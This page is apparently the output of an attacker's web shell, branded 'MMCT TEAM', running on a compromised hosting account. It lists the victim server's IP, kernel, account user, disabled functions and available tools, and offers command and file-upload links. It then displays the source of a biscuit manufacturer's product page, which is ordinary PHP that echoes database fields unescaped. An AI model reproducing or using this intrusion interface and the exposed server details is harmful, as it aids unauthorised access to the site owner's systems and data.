MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.218.190.118
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/usfoodsltd.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/usfoodsltd.com/products.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Coconut Cookies & Bourbon Biscuits Manufacturer in Gajraula</title>
    <meta name="description" content="Check out a wide range of biscuits online from top brands like Crispy Crunchy Zaika Biscuits & Marie Day Biscuits at great offers on US Foods Ltd.">
    <?php include "headlinks.php";?>
    <style>

    </style>

</head>

<body class="tt-magic-cursor">
    <?php include "header.php"?>

    <div class="breadcrumb-section" style="background-image: url(assets/images/create/bg.jpg);">
        <!-- <div class="breadcrumb-left-vec">
        <img src="assets/images/icon/breadcumb-left-vec.svg" alt="breadcumb-left-vec">
    </div>
    <div class="breadcrumb-right-vec">
        <img src="assets/images/icon/breadcumb-right-vec.svg" alt="breadcumb-right-vec">
    </div> -->
        <div class="container">
            <div class="row d-flex justify-content-center align-items-center">
                <div class="col-lg-12">
                    <h2 class="breadcrumb-title">Products</h2>
                    <nav aria-label="breadcrumb">
                        <ol class="breadcrumb d-flex">
                            <li class="breadcrumb-item"><a href="index.php">Home</a></li>
                            <li class="breadcrumb-item active" aria-current="page">Products</li>
                        </ol>
                    </nav>
                </div>
            </div>
        </div>
    </div>
    <div class="recent-post-area mb-120 mt-40">
        <div class="container">
            <div class="row d-flex justify-content-center mb-40">
                <div class="col-lg-8">
                    <div class="section-title text-center">
                        <span><img class="left-vec" src="assets/images/icon/sub-title-vec.svg"
                                alt="sub-title-vec">Products<img class="right-vec"
                                src="assets/images/icon/sub-title-vec.svg" alt="sub-title-vec"></span>
                        <h2>Our Products</h2>
                    </div>
                </div>
            </div>
            <div class="row g-4 justify-content-center">
                <?php
                    include "admin/config.php";
                    $sqlprod = "SELECT * FROM `products_page`";
                    $runprod = mysqli_query($conn,$sqlprod) or die("Query Not run");
                    while($row1 = mysqli_fetch_assoc($runprod)){
                ?>
            
                <div class="col-lg-4 col-md-6 col-sm-10">
                    <div class="news-wrap">
                        <div class="post-thum">
                        <a href="<?php echo $wspath?>product<?php echo $row1['slug_name'];?>.html"><img class="img-fluid " src="<?php echo $wspath?>assets/images/products/<?php echo $row1['image'];?>" alt=""></a>
                        </div>
                        <div class="news-content pl-2">
                            <h3><a href="<?php echo $wspath?>product<?php echo $row1['slug_name'];?>.html"><?php echo $row1['name'];?></a></h3>
                        </div>
                    </div>
                </div>

            
               <?php 
               } ?>
            </div>
        </div>
    </div>

    <?php include "footer.php"?>

</body>

</html>

MMCT - 2023